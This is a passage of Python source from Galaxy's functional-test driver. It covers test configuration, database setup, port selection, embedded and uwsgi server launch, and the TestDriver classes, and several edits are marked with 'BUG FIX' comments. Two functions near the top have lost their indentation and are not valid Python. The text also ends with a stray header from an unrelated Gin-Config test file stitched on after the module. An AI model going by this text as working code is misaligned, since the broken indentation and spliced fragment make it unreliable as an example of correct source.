            contents_template = string.Template(contents)
            expanded_contents = contents_template.safe_substitute(temp_directory=tmpdir)
            f.write(expanded_contents)
        config["object_store_config_file"] = object_store_config
    if datatypes_conf is not None:
        config["datatypes_config_file"] = datatypes_conf
    if enable_tool_shed_check:
        config["enable_tool_shed_check"] = enable_tool_shed_check
        config["hours_between_check"] = 0.001
    tool_dependency_dir = os.environ.get("GALAXY_TOOL_DEPENDENCY_DIR")
    if tool_dependency_dir:
        config["tool_dependency_dir"] = tool_dependency_dir
    # Used by shed's twill dependency stuff
    # TODO: read from Galaxy's config API.
    os.environ["GALAXY_TEST_TOOL_DEPENDENCY_DIR"] = tool_dependency_dir or os.path.join(tmpdir, "dependencies")
    return config
def _resolve_relative_config_paths(config_option):
# If option is not None, split into paths, resolve each w.r.t. root, then rebuild as csv string.
if config_option is not None:
resolved = []
for path in config_option.split(","):
resolved.append(os.path.join(galaxy_root, path.strip()))
return ",".join(resolved)
def _tool_data_table_config_path(default_tool_data_table_config_path=None):
tool_data_table_config_path = os.environ.get(
"GALAXY_TEST_TOOL_DATA_TABLE_CONF", default_tool_data_table_config_path
)
if tool_data_table_config_path is None:
# ... otherwise find whatever Galaxy would use as the default and
# the sample data for functional tests to that.
default_tool_data_config = "lib/galaxy/config/sample/tool_data_table_conf.xml.sample"
for tool_data_config in ["config/tool_data_table_conf.xml", "tool_data_table_conf.xml"]:
if os.path.exists(tool_data_config):
default_tool_data_config = tool_data_config
test_tool_data_config = "test/functional/tool-data/sample_tool_data_tables.xml"
tool_data_table_config_path = f"{default_tool_data_config},{test_tool_data_config}"
return tool_data_table_config_path
def nose_config_and_run(argv=None, env=None, ignore_files=None, plugins=None):
    """Setup a nose context and run tests.

    Tests are specified by argv (defaulting to sys.argv).

    :param argv: argument vector handed to nose (default: sys.argv).
    :param env: environment mapping for nose's Config (default: os.environ).
    :param ignore_files: patterns of files nose should skip.
    :param plugins: nose plugin manager (default: DefaultPluginManager).
    :returns: True when the test run was successful.
    """
    if env is None:
        env = os.environ
    if ignore_files is None:
        ignore_files = []
    if plugins is None:
        plugins = nose.plugins.manager.DefaultPluginManager()
    if argv is None:
        argv = sys.argv
    test_config = nose.config.Config(
        # BUG FIX: previously passed os.environ here, silently ignoring the
        # resolved ``env`` argument.
        env=env,
        ignoreFiles=ignore_files,
        plugins=plugins,
    )
    # Add custom plugin to produce JSON data used by planemo.
    test_config.plugins.addPlugin(StructuredTestDataPlugin())
    test_config.configure(argv)
    result = run(test_config)
    success = result.wasSuccessful()
    return success
def copy_database_template(source, db_path):
    """Copy a 'clean' sqlite template database.

    From file or URL to specified path for sqlite database.
    """
    target_dir = os.path.dirname(db_path)
    if not os.path.exists(target_dir):
        os.makedirs(target_dir)
    if os.path.exists(source):
        shutil.copy(source, db_path)
        assert os.path.exists(db_path)
        return
    if source.lower().startswith(("http://", "https://", "ftp://")):
        try:
            download_to_file(source, db_path)
        except Exception as e:
            # We log the exception but don't fail startup, since we can
            # do all migration steps instead of downloading a template.
            log.exception(e)
        return
    raise Exception(f"Failed to copy database template from source {source}")
def database_conf(db_path, prefix="GALAXY", prefer_template_database=False):
    """Find (and populate if needed) Galaxy database connection.

    Resolution order: a ``<prefix>_TEST_DBURI`` environment variable wins
    (optionally templated into a random postgres database); otherwise an
    sqlite database under ``db_path`` is used, seeded from
    ``<prefix>_TEST_DB_TEMPLATE`` when that variable is set.  Returns a dict
    of database-related config options.
    """
    database_auto_migrate = False
    check_migrate_databases = True
    dburi_var = f"{prefix}_TEST_DBURI"
    template_name = None
    if dburi_var in os.environ:
        database_connection = os.environ[dburi_var]
        # only template if postgres - not mysql or sqlite
        do_template = prefer_template_database and database_connection.startswith("p")
        if do_template:
            database_template_parsed = urlparse(database_connection)
            template_name = database_template_parsed.path[1:]  # drop / from /galaxy
            # Random database name so parallel runs don't collide.
            actual_db = f"gxtest{''.join(random.choice(string.ascii_uppercase) for _ in range(10))}"
            actual_database_parsed = database_template_parsed._replace(path=f"/{actual_db}")
            database_connection = actual_database_parsed.geturl()
            if not database_exists(database_connection):
                # We pass by migrations and instantiate the current table
                create_database(database_connection)
                mapping.init("/tmp", database_connection, create_tables=True, map_install_models=True)
                toolshed_mapping.init(database_connection, create_tables=True)
                check_migrate_databases = False
    else:
        default_db_filename = f"{prefix.lower()}.sqlite"
        template_var = f"{prefix}_TEST_DB_TEMPLATE"
        db_path = os.path.join(db_path, default_db_filename)
        if template_var in os.environ:
            # Middle ground between recreating a completely new
            # database and pointing at existing database with
            # GALAXY_TEST_DBURI. The former requires a lot of setup
            # time, the latter results in test failures in certain
            # cases (namely tool shed tests expecting clean database).
            copy_database_template(os.environ[template_var], db_path)
            database_auto_migrate = True
        database_connection = f"sqlite:///{db_path}"
    config = {
        "check_migrate_databases": check_migrate_databases,
        "database_connection": database_connection,
        "database_auto_migrate": database_auto_migrate,
    }
    if not database_connection.startswith("sqlite://"):
        # Larger pool settings only make sense for server databases.
        config["database_engine_option_max_overflow"] = "20"
        config["database_engine_option_pool_size"] = "10"
    if template_name:
        config["database_template"] = template_name
    return config
def install_database_conf(db_path, default_merged=False):
    """Build install-database connection settings for a test Galaxy instance.

    An empty dict means the install models share the main Galaxy database.
    """
    connection: Optional[str]
    if "GALAXY_TEST_INSTALL_DBURI" in os.environ:
        connection = os.environ["GALAXY_TEST_INSTALL_DBURI"]
    elif asbool(os.environ.get("GALAXY_TEST_INSTALL_DB_MERGED", default_merged)):
        # Merged into the main Galaxy database - no separate connection.
        connection = None
    else:
        connection = f"sqlite:///{os.path.join(db_path, 'install.sqlite')}"
    return {} if connection is None else {"install_database_connection": connection}
def database_files_path(test_tmpdir, prefix="GALAXY"):
    """Create a mock database/ directory like in GALAXY_ROOT.

    ``<prefix>_TEST_DBPATH`` (e.g. GALAXY_TEST_DBPATH or TOOL_SHED_TEST_DBPATH)
    overrides the computed location when set in the environment.
    """
    override = os.environ.get(f"{prefix}_TEST_DBPATH")
    if override is not None:
        return override
    return os.path.join(tempfile.mkdtemp(dir=test_tmpdir), "database")
def _get_static_settings():
    """Configuration required for Galaxy static middleware.

    Returns dictionary of the settings necessary for a galaxy App
    to be wrapped in the static middleware.
    This mainly consists of the filesystem locations of url-mapped
    static resources.
    """
    static_dir = os.path.join(galaxy_root, "static")

    def _static(*parts):
        return os.path.join(static_dir, *parts)

    # TODO: these should be copied from config/galaxy.ini
    return {
        "static_enabled": True,
        "static_cache_time": 360,
        "static_dir": static_dir,
        "static_images_dir": _static("images", ""),
        "static_favicon_dir": _static("favicon.ico"),
        "static_scripts_dir": _static("scripts", ""),
        "static_style_dir": _static("style"),
        "static_robots_txt": _static("robots.txt"),
    }
def get_webapp_global_conf():
    """Get the global_conf dictionary sent to ``app_factory``."""
    # (was originally sent 'dict()') - nothing here for now except static settings
    return dict(_get_static_settings())
def wait_for_http_server(host, port, prefix=None, sleep_amount=0.1, sleep_tries=150):
    """Wait for an HTTP server to boot up.

    Polls ``GET <prefix>`` on (host, port) until a 200 is returned, sleeping
    ``sleep_amount`` seconds between at most ``sleep_tries`` attempts.

    :raises Exception: if the server never returns '200 OK'.
    """
    # Test if the server is up
    prefix = prefix or "/"
    if not prefix.endswith("/"):
        prefix = f"{prefix}/"
    for _ in range(sleep_tries):
        # directly test the app, not the proxy
        conn = http.client.HTTPConnection(host, port)
        try:
            conn.request("GET", prefix)
            response = conn.getresponse()
            if response.status == 200:
                break
        except OSError as e:
            # 61 (macOS) / 111 (Linux) are ECONNREFUSED - server not up yet.
            if e.errno not in [61, 111]:
                raise
        finally:
            # BUG FIX: the connection was previously never closed, leaking a
            # socket per retry.
            conn.close()
        time.sleep(sleep_amount)
    else:
        # BUG FIX: the message previously hard-coded "10 tries" regardless of
        # the actual sleep_tries value.
        template = "Test HTTP server on host %s and port %s did not return '200 OK' after %s tries"
        message = template % (host, port, sleep_tries)
        raise Exception(message)
def attempt_port(port):
    """Return ``port`` if it can be bound on all interfaces, else ``None``."""
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        probe.bind(("", port))
    except OSError:
        # Port already in use (or otherwise unbindable).
        return None
    probe.close()
    return port
def attempt_ports(port):
    """Return ``port`` when one was requested, else pick a random free one.

    The chosen random port (a string) is also exported as GALAXY_WEB_PORT.

    :raises Exception: when no free port can be found after several attempts.
    """
    if port is not None:
        # An explicitly requested port is used as-is; availability is the
        # caller's responsibility.  (A raise after this return used to be
        # unreachable dead code and has been removed.)
        return port
    random.seed()
    for _ in range(0, 9):
        port = attempt_port(random.randint(8000, 10000))
        if port:
            port = str(port)
            os.environ["GALAXY_WEB_PORT"] = port
            return port
    raise Exception(f"Unable to open a port between {8000} and {10000} to start Galaxy server")
def serve_webapp(webapp, port=None, host=None):
    """Serve the webapp on a recommend port or a free one.

    Return the port the webapp is running on.
    """
    chosen_port = attempt_ports(port)
    server = httpserver.serve(webapp, host=host, port=chosen_port, start_loop=False)
    # Run the serve loop in the background so callers keep control.
    threading.Thread(target=server.serve_forever).start()
    return server, chosen_port
def uvicorn_serve(app, port, host=None):
    """Serve the webapp on a recommend port or a free one.

    Return the port the webapp is running on.
    """
    import asyncio

    from uvicorn.config import Config
    from uvicorn.server import Server

    # Access logging is noisy for tests; allow disabling via the environment.
    access_log = "GALAXY_TEST_DISABLE_ACCESS_LOG" not in os.environ
    server = Server(config=Config(app, host=host, port=int(port), access_log=access_log))
    loop = asyncio.new_event_loop()

    def _drive_loop():
        try:
            asyncio.set_event_loop(loop)
            loop.run_until_complete(server.serve())
        finally:
            loop.close()
            asyncio.set_event_loop(None)
            log.info("Event loop for uvicorn closed")

    thread = threading.Thread(target=_drive_loop)
    thread.start()
    return server, port, thread
def cleanup_directory(tempdir):
    """Clean up temporary files used by test unless GALAXY_TEST_NO_CLEANUP is set.

    Also respect TOOL_SHED_TEST_NO_CLEANUP for legacy reasons.
    """
    skip_cleanup = "GALAXY_TEST_NO_CLEANUP" in os.environ or "TOOL_SHED_TEST_NO_CLEANUP" in os.environ
    if skip_cleanup:
        log.info(f"GALAXY_TEST_NO_CLEANUP is on. Temporary files in {tempdir}")
        return
    try:
        # ``skip_cleanup`` is already known False here; the old re-check inside
        # the try block was redundant and has been removed.
        if os.path.exists(tempdir):
            shutil.rmtree(tempdir)
    except Exception:
        # Best-effort removal: failures (e.g. files still in use) are ignored.
        pass
def setup_shed_tools_for_test(app, tmpdir, testing_migrated_tools, testing_installed_tools):
    """Modify Galaxy app's toolbox for migrated or installed tool tests."""
    if not testing_installed_tools:
        return
    # TODO: Do this without modifying app - that is a pretty violation
    # of Galaxy's abstraction - we shouldn't require app at all let alone
    # be modifying it.
    tool_configs = app.config.tool_configs
    # Eliminate the migrated_tool_panel_config from the app's tool_configs,
    # append the list of installed_tool_panel_configs, and reload the app's
    # toolbox.
    relative_migrated_tool_panel_config = os.path.join(app.config.root, MIGRATED_TOOL_PANEL_CONFIG)
    if relative_migrated_tool_panel_config in tool_configs:
        tool_configs.remove(relative_migrated_tool_panel_config)
    tool_configs.extend(INSTALLED_TOOL_PANEL_CONFIGS)
    from galaxy import tools  # delay import because this brings in so many modules for small tests # noqa: E402
    app.toolbox = tools.ToolBox(tool_configs, app.config.tool_path, app)
def build_galaxy_app(simple_kwargs) -> GalaxyUniverseApplication:
    """Build a Galaxy app object from a simple keyword arguments.

    Construct paste style complex dictionary and use load_app_properties so
    Galaxy override variables are respected. Also setup "global" references
    to sqlalchemy database context for Galaxy and install databases.
    """
    log.info("Galaxy database connection: %s", simple_kwargs["database_connection"])
    simple_kwargs["global_conf"] = get_webapp_global_conf()
    simple_kwargs["global_conf"]["__file__"] = "lib/galaxy/config/sample/galaxy.yml.sample"
    simple_kwargs = load_app_properties(kwds=simple_kwargs)
    # Build the Universe Application
    app = GalaxyUniverseApplication(**simple_kwargs)
    log.info("Embedded Galaxy application started")
    # Publish the database contexts for legacy twill-era helpers in this module.
    global galaxy_context
    global install_context
    galaxy_context = app.model.context
    install_context = app.install_model.context
    # Toolbox indexing happens via the work queue out of band recently, and,
    # beyond potentially running async after tests execute doesn't execute
    # without building a uwsgi app (app.is_webapp = False for this test kit).
    # We need to ensure to build an index for the test galaxy app -- this is
    # pretty fast with the limited toolset
    app.reindex_tool_search()
    return app
def build_shed_app(simple_kwargs):
    """Build a Galaxy app object from a simple keyword arguments.

    Construct paste style complex dictionary. Also setup "global" reference
    to sqlalchemy database context for tool shed database.
    """
    log.info("Tool shed database connection: %s", simple_kwargs["database_connection"])
    # TODO: Simplify global_conf to match Galaxy above...
    simple_kwargs["__file__"] = "tool_shed_wsgi.yml.sample"
    simple_kwargs["global_conf"] = get_webapp_global_conf()
    app = ToolshedUniverseApplication(**simple_kwargs)
    log.info("Embedded Toolshed application started")
    # Publish the database context for legacy twill-era helpers in this module.
    global tool_shed_context
    tool_shed_context = app.model.context
    return app
def explicitly_configured_host_and_port(prefix, config_object):
    """Determine the host/port a test server should bind to.

    ``host`` comes from ``<prefix>_TEST_HOST`` (or the config object's
    ``default_web_host``).  ``port`` comes from ``<prefix>_TEST_PORT`` unless
    ``<prefix>_TEST_PORT_RANDOM`` is set, in which case ``None`` is returned
    so a random free port is chosen later.
    """
    host_env_key = f"{prefix}_TEST_HOST"
    port_env_key = f"{prefix}_TEST_PORT"
    port_random_env_key = f"{prefix}_TEST_PORT_RANDOM"
    default_web_host = getattr(config_object, "default_web_host", DEFAULT_WEB_HOST)
    host = os.environ.get(host_env_key, default_web_host)
    if os.environ.get(port_random_env_key, None) is not None:
        # Ignore the port environment variable, it wasn't explicitly configured.
        port = None
    else:
        port = os.environ.get(port_env_key, None)
    # If an explicit port wasn't assigned for this test or test case, record in
    # the environment that it is random so it can be randomly re-assigned for
    # new tests.
    if port is None:
        # BUG FIX: this was hard-coded to "GALAXY_TEST_PORT_RANDOM", which is
        # wrong for any other prefix (e.g. TOOL_SHED); use the derived key.
        os.environ[port_random_env_key] = "1"
    else:
        os.environ["GALAXY_WEB_PORT"] = port
    return host, port
def set_and_wait_for_http_target(prefix, host, port, url_prefix, sleep_amount=0.1, sleep_tries=150):
    """Export the chosen host/port for ``prefix`` and block until the server responds."""
    os.environ[f"{prefix}_TEST_HOST"] = host
    os.environ[f"{prefix}_TEST_PORT"] = port
    wait_for_http_server(host, port, url_prefix, sleep_amount=sleep_amount, sleep_tries=sleep_tries)
class ServerWrapper:
    """Base handle on a running test server: name, host, port and URL prefix.

    Subclasses provide the actual ``app`` object and ``stop()`` semantics.
    """

    def __init__(self, name, host, port, prefix=""):
        self.name, self.host, self.port, self.prefix = name, host, port, prefix

    @property
    def app(self):
        raise NotImplementedError("Test can be run against target - requires a Galaxy app object.")

    def stop(self):
        raise NotImplementedError()
class EmbeddedServerWrapper(ServerWrapper):
    """ServerWrapper around an in-process (embedded) application and web server."""

    def __init__(self, app, server, name, host, port, prefix="", thread=None):
        super().__init__(name, host, port, prefix)
        self._app = app
        self._server = server
        self._thread = thread

    @property
    def app(self):
        return self._app

    def stop(self):
        log.info(f"{threading.active_count()} threads were active before stopping embedded server")

        server = self._server
        if server is not None:
            # Paste-style servers expose server_close().
            if hasattr(server, "server_close"):
                log.info(f"Shutting down embedded {self.name} Paste server")
                server.server_close()
                log.info(f"Embedded web server {self.name} stopped")
            # uvicorn servers are asked to exit via should_exit.
            if hasattr(server, "shutdown"):
                log.info(f"Shutting down embedded {self.name} uvicorn server")
                server.should_exit = True
                log.info(f"Embedded web server {self.name} stopped")

        if self._thread is not None:
            log.info("Stopping embedded server thread")
            self._thread.join()
            log.info("Embedded server thread stopped")

        if self._app is not None:
            log.info(f"Stopping application {self.name}")
            self._app.shutdown()
            log.info(f"Application {self.name} stopped.")

        log.info(f"{threading.active_count()} active after stopping embedded server")
class UwsgiServerWrapper(ServerWrapper):
    """ServerWrapper around an external uwsgi subprocess."""

    def __init__(self, p, name, host, port):
        super().__init__(name, host, port)
        self._p = p
        self._r = None
        # Reap the child in the background so it never lingers as a zombie.
        self._t = threading.Thread(target=self.wait)
        self._t.start()

    def __del__(self):
        self._t.join()

    def wait(self):
        self._r = self._p.wait()

    def stop(self):
        def _signal_group(sig):
            try:
                os.killpg(os.getpgid(self._p.pid), sig)
            except Exception:
                # Process group may already be gone.
                pass

        _signal_group(signal.SIGTERM)
        # Short grace period before the hard kill.
        time.sleep(0.1)
        _signal_group(signal.SIGKILL)
        self._t.join()
def launch_uwsgi(kwargs, tempdir, prefix=DEFAULT_CONFIG_PREFIX, config_object=None):
    """Launch a uwsgi-hosted Galaxy server for the tests.

    Writes the Galaxy config ``kwargs`` as YAML into ``tempdir``, starts a
    uwsgi process against it, waits for the HTTP server to come up, and
    returns a :class:`UwsgiServerWrapper`.

    Raises whatever ``set_and_wait_for_http_target`` raised if the server
    never becomes reachable (the uwsgi process is stopped first).
    """
    name = prefix.lower()
    host, port = explicitly_configured_host_and_port(prefix, config_object)

    config = {}
    config["galaxy"] = kwargs.copy()
    enable_realtime_mapping = getattr(config_object, "enable_realtime_mapping", False)
    if enable_realtime_mapping:
        # Fill in interactive-tool settings only where the caller did not
        # provide an explicit value.
        interactive_tool_defaults = {
            "interactivetools_prefix": "interactivetool",
            "interactivetools_map": os.path.join(tempdir, "interactivetools_map.sqlite"),
            "interactivetools_enable": True,
        }
        for key, value in interactive_tool_defaults.items():
            if key not in config["galaxy"]:
                config["galaxy"][key] = value
    yaml_config_path = os.path.join(tempdir, "galaxy.yml")
    with open(yaml_config_path, "w") as f:
        yaml.dump(config, f)
    if enable_realtime_mapping:
        # Avoid YAML.dump configuration since uwsgi doesn't like real YAML :( -
        # though maybe it would work?
        with open(yaml_config_path) as f:
            old_contents = f.read()
        with open(yaml_config_path, "w") as f:
            test_port = str(port) if port else r"[0-9]+"
            test_host = re.escape(host) if host else "localhost"
            uwsgi_section = REALTIME_PROXY_TEMPLATE.safe_substitute(
                test_host=test_host, test_port=test_port, tempdir=tempdir
            )
            f.write(uwsgi_section)
            f.write(old_contents)

    def attempt_port_bind(port):
        # Build and start the uwsgi process bound to host:port.
        uwsgi_command = [
            "uwsgi",
            "--http",
            f"{host}:{port}",
            "--yaml",
            yaml_config_path,
            "--module",
            "galaxy.webapps.galaxy.buildapp:uwsgi_app_factory()",
            "--enable-threads",
            "--die-on-term",
        ]
        # Propagate the current interpreter's import paths to uwsgi.
        for path in sys.path:
            uwsgi_command.append("--pythonpath")
            uwsgi_command.append(path)
        handle_uwsgi_cli_command = getattr(config_object, "handle_uwsgi_cli_command", None)
        if handle_uwsgi_cli_command is not None:
            handle_uwsgi_cli_command(uwsgi_command)

        # we don't want to quote every argument but we don't want to print unquoted ones either, so do this
        log.info("Starting uwsgi with command line: %s", " ".join(shlex.quote(x) for x in uwsgi_command))
        p = subprocess.Popen(
            uwsgi_command,
            cwd=galaxy_root,
            # New session so stop() can signal the whole process group.
            preexec_fn=os.setsid,
        )
        return UwsgiServerWrapper(p, name, host, port)

    port = attempt_ports(port)
    server_wrapper = attempt_port_bind(port)
    try:
        set_and_wait_for_http_target(prefix, host, port, url_prefix="/", sleep_tries=50)
        log.info(f"Test-managed uwsgi web server for {name} started at {host}:{port}")
        return server_wrapper
    except Exception:
        server_wrapper.stop()
        # Fix: previously the exception was swallowed here and None was
        # implicitly returned; propagate the startup failure to the caller.
        raise
def launch_uvicorn(webapp_factory, prefix=DEFAULT_CONFIG_PREFIX, galaxy_config=None, config_object=None):
    """Build a Galaxy app and serve it with an embedded uvicorn server.

    Returns an :class:`EmbeddedServerWrapper` once the HTTP endpoint
    responds.
    """
    name = prefix.lower()
    host, port = explicitly_configured_host_and_port(prefix, config_object)
    port = attempt_ports(port)

    galaxy_app = build_galaxy_app(galaxy_config)
    wsgi_webapp = webapp_factory(
        galaxy_config["global_conf"],
        app=galaxy_app,
        use_translogger=False,
        static_enabled=True,
        register_shutdown_at_exit=False,
    )
    from galaxy.webapps.galaxy.fast_app import initialize_fast_app

    asgi_app = initialize_fast_app(wsgi_webapp, galaxy_app)

    server, port, thread = uvicorn_serve(asgi_app, host=host, port=port)
    url_prefix = galaxy_app.config.galaxy_url_prefix
    set_and_wait_for_http_target(prefix, host, port, url_prefix=url_prefix)
    log.info(f"Embedded uvicorn web server for {name} started at {host}:{port}{url_prefix}")
    return EmbeddedServerWrapper(
        galaxy_app, server, name, host, port, thread=thread, prefix=url_prefix
    )
def launch_server(app, webapp_factory, kwargs, prefix=DEFAULT_CONFIG_PREFIX, config_object=None):
    """Launch a web server for a given app using supplied factory.

    Consistently read either GALAXY_TEST_HOST and GALAXY_TEST_PORT or
    TOOL_SHED_TEST_HOST and TOOL_SHED_TEST_PORT and ensure these are
    all set after this method has been called.
    """
    name = prefix.lower()
    host, port = explicitly_configured_host_and_port(prefix, config_object)

    wsgi_webapp = webapp_factory(
        kwargs["global_conf"],
        app=app,
        use_translogger=False,
        static_enabled=True,
        register_shutdown_at_exit=False,
    )
    server, port = serve_webapp(wsgi_webapp, host=host, port=port)
    set_and_wait_for_http_target(prefix, host, port, url_prefix="/")
    log.info(f"Embedded paste web server for {name} started at {host}:{port}")
    return EmbeddedServerWrapper(app, server, name, host, port)
class TestDriver:
    """Responsible for the life-cycle of a Galaxy-style functional test.

    Sets up servers, configures tests, runs nose, and tears things
    down. This is somewhat like a Python TestCase - but different
    because it is meant to provide a main() endpoint.
    """

    __test__ = False  # Prevent pytest from discovering this class (issue #12071)

    def __init__(self):
        """Setup tracked resources."""
        self.server_wrappers = []
        self.temp_directories = []

    def setup(self):
        """Called before tests are built."""

    def build_tests(self):
        """After environment is setup, setup nose tests."""

    def tear_down(self):
        """Cleanup resources tracked by this object."""
        self.stop_servers()
        for temp_directory in self.temp_directories:
            cleanup_directory(temp_directory)

    def stop_servers(self):
        """Stop every tracked server wrapper and forget them all."""
        for server_wrapper in self.server_wrappers:
            server_wrapper.stop()
        self.server_wrappers = []

    def mkdtemp(self):
        """Return a temp directory that is properly cleaned up or not based on the config."""
        temp_directory = tempfile.mkdtemp()
        self.temp_directories.append(temp_directory)
        return temp_directory

    def run(self):
        """Driver whole test.

        Setup environment, build tests (if needed), run test,
        and finally cleanup resources.
        """
        configure_environment()
        self.setup()
        self.build_tests()
        try:
            success = nose_config_and_run()
            return 0 if success else 1
        except Exception:
            log.info("Failure running tests")
            # Fix: bare `raise` preserves the original traceback instead of
            # re-raising the bound exception (`raise e`).
            raise
        finally:
            log.info("Shutting down")
            self.tear_down()
class GalaxyTestDriver(TestDriver):
    """Instantiate a Galaxy-style nose TestDriver for testing Galaxy."""

    testing_shed_tools = False

    def _configure(self, config_object=None):
        """Setup various variables used to launch a Galaxy server."""
        config_object = self._ensure_config_object(config_object)
        self.external_galaxy = os.environ.get("GALAXY_TEST_EXTERNAL", None)

        # Allow a particular test to force uwsgi or any test to use uwsgi with
        # the GALAXY_TEST_UWSGI environment variable.
        use_uwsgi = bool(os.environ.get("GALAXY_TEST_UWSGI", None))
        if not use_uwsgi:
            if getattr(config_object, "require_uwsgi", None):
                use_uwsgi = True
        self.use_uwsgi = use_uwsgi

        # When uwsgi is not in use, uvicorn is the preferred embedded server.
        if getattr(config_object, "use_uvicorn", USE_UVICORN):
            self.else_use_uvicorn = True
        else:
            self.else_use_uvicorn = False

        # Allow controlling the log format
        log_format = os.environ.get("GALAXY_TEST_LOG_FORMAT", None)
        if not log_format and use_uwsgi:
            # uwsgi workers/mules need extra context in each log record.
            log_format = (
                "%(name)s %(levelname)-5.5s %(asctime)s "
                "[p:%(process)s,w:%(worker_id)s,m:%(mule_id)s] "
                "[%(threadName)s] %(message)s"
            )

        self.log_format = log_format

        self.galaxy_test_tmp_dir = get_galaxy_test_tmp_dir()
        self.temp_directories.append(self.galaxy_test_tmp_dir)

        self.testing_shed_tools = getattr(config_object, "testing_shed_tools", False)

        if getattr(config_object, "framework_tool_and_types", False):
            default_tool_conf = FRAMEWORK_SAMPLE_TOOLS_CONF
            datatypes_conf_override = FRAMEWORK_DATATYPES_CONF
        else:
            default_tool_conf = getattr(config_object, "default_tool_conf", None)
            datatypes_conf_override = getattr(config_object, "datatypes_conf_override", None)

        allow_tool_conf_override = getattr(config_object, "allow_tool_conf_override", True)
        self.allow_tool_conf_override = allow_tool_conf_override
        self.default_tool_conf = default_tool_conf
        self.datatypes_conf_override = datatypes_conf_override

    def setup(self, config_object=None):
        """Setup a Galaxy server for functional test (if needed).

        Configuration options can be specified as attributes on the supplied
        ```config_object``` (defaults to self).
        """
        self._saved_galaxy_config = None
        self._configure(config_object)
        self._register_and_run_servers(config_object)

    def restart(self, config_object=None, handle_config=None):
        """Stop the managed servers and launch fresh ones (reusing config)."""
        self.stop_servers()
        self._register_and_run_servers(config_object, handle_config=handle_config)

    def _register_and_run_servers(self, config_object=None, handle_config=None):
        config_object = self._ensure_config_object(config_object)
        self.app = None

        if self.external_galaxy is None:
            # Fix: create the tempdir unconditionally. It was previously only
            # bound in the no-saved-config branch, so restart() with a saved
            # config and use_uwsgi raised NameError at the launch_uwsgi call.
            tempdir = tempfile.mkdtemp(dir=self.galaxy_test_tmp_dir)
            if self._saved_galaxy_config is not None:
                galaxy_config = self._saved_galaxy_config
            else:
                # Configure the database path.
                galaxy_db_path = database_files_path(tempdir)
                # Allow config object to specify a config dict or a method to produce
                # one - other just read the properties above and use the default
                # implementation from this file.
                galaxy_config = getattr(config_object, "galaxy_config", None)
                if callable(galaxy_config):
                    galaxy_config = galaxy_config()
                if galaxy_config is None:
                    setup_galaxy_config_kwds = dict(
                        allow_path_paste=getattr(config_object, "allow_path_paste", False),
                        use_test_file_dir=not self.testing_shed_tools,
                        default_install_db_merged=True,
                        default_tool_conf=self.default_tool_conf,
                        datatypes_conf=self.datatypes_conf_override,
                        prefer_template_database=getattr(config_object, "prefer_template_database", False),
                        log_format=self.log_format,
                        conda_auto_init=getattr(config_object, "conda_auto_init", False),
                        conda_auto_install=getattr(config_object, "conda_auto_install", False),
                        use_shared_connection_for_amqp=getattr(config_object, "use_shared_connection_for_amqp", False),
                        allow_tool_conf_override=self.allow_tool_conf_override,
                    )
                    galaxy_config = setup_galaxy_config(galaxy_db_path, **setup_galaxy_config_kwds)

                    isolate_galaxy_config = getattr(config_object, "isolate_galaxy_config", False)
                    if isolate_galaxy_config:
                        galaxy_config["config_dir"] = tempdir

                    self._saved_galaxy_config = galaxy_config

            if galaxy_config is not None:
                handle_galaxy_config_kwds = handle_config or getattr(config_object, "handle_galaxy_config_kwds", None)
                if handle_galaxy_config_kwds is not None:
                    handle_galaxy_config_kwds(galaxy_config)

            if self.use_uwsgi:
                server_wrapper = launch_uwsgi(
                    galaxy_config,
                    tempdir=tempdir,
                    config_object=config_object,
                )
            elif self.else_use_uvicorn:
                server_wrapper = launch_uvicorn(
                    lambda *args, **kwd: buildapp.app_factory(*args, wsgi_preflight=False, **kwd),
                    galaxy_config=galaxy_config,
                    config_object=config_object,
                )
                self.app = server_wrapper.app
            else:
                # ---- Build Application --------------------------------------------------
                self.app = build_galaxy_app(galaxy_config)
                server_wrapper = launch_server(
                    self.app,
                    buildapp.app_factory,
                    galaxy_config,
                    config_object=config_object,
                )
            # Fix: this branch launches a server managed by the test driver;
            # the previous message incorrectly claimed it was "external"
            # (swapped with the message in the else branch below).
            log.info(
                f"Functional tests will be run against test managed Galaxy server {server_wrapper.host}:{server_wrapper.port}"
            )
            self.server_wrappers.append(server_wrapper)
        else:
            log.info(f"Functional tests will be run against external Galaxy server {self.external_galaxy}")
            # Ensure test file directory setup even though galaxy config isn't built.
            ensure_test_file_dir_set()

    def _ensure_config_object(self, config_object):
        # Default to using this driver itself as the configuration source.
        if config_object is None:
            config_object = self
        return config_object

    def setup_shed_tools(self, testing_migrated_tools=False, testing_installed_tools=True):
        setup_shed_tools_for_test(self.app, self.galaxy_test_tmp_dir, testing_migrated_tools, testing_installed_tools)

    def build_tool_tests(self, testing_shed_tools=None, return_test_classes=False):
        if self.app is None:
            return

        if testing_shed_tools is None:
            testing_shed_tools = getattr(self, "testing_shed_tools", False)

        # We must make sure that functional.test_toolbox is always imported after
        # database_contexts.galaxy_content is set (which occurs in this method above).
        # If functional.test_toolbox is imported before database_contexts.galaxy_content
        # is set, sa_session will be None in all methods that use it.
        import functional.test_toolbox

        functional.test_toolbox.toolbox = self.app.toolbox
        # When testing data managers, do not test toolbox.
        test_classes = functional.test_toolbox.build_tests(
            app=self.app,
            testing_shed_tools=testing_shed_tools,
            master_api_key=get_admin_api_key(),
            user_api_key=get_user_api_key(),
        )
        if return_test_classes:
            return test_classes
        return functional.test_toolbox

    def run_tool_test(self, tool_id, index=0, resource_parameters=None, **kwd):
        """Run a single tool test against the configured Galaxy target."""
        if resource_parameters is None:
            resource_parameters = {}
        host, port, url = target_url_parts()
        galaxy_interactor_kwds = {
            "galaxy_url": url,
            "master_api_key": get_admin_api_key(),
            "api_key": get_user_api_key(),
            "keep_outputs_dir": None,
        }
        galaxy_interactor = GalaxyInteractorApi(**galaxy_interactor_kwds)
        verify_tool(
            tool_id=tool_id,
            test_index=index,
            galaxy_interactor=galaxy_interactor,
            resource_parameters=resource_parameters,
            **kwd,
        )
def drive_test(test_driver_class):
    """Instantiate driver class, run, and exit appropriately."""
    driver = test_driver_class()
    exit_code = driver.run()
    sys.exit(exit_code)
# Names re-exported as the public API of this module.
__all__ = (
    "copy_database_template",
    "build_logger",
    "drive_test",
    "FRAMEWORK_UPLOAD_TOOL_CONF",
    "FRAMEWORK_SAMPLE_TOOLS_CONF",
    "FRAMEWORK_DATATYPES_CONF",
    "database_conf",
    "get_webapp_global_conf",
    "nose_config_and_run",
    "setup_galaxy_config",
    "TestDriver",
    "wait_for_http_server",
)
|
config_test.py | # coding=utf-8
# Copyright 2018 The Gin-Config Authors.
#
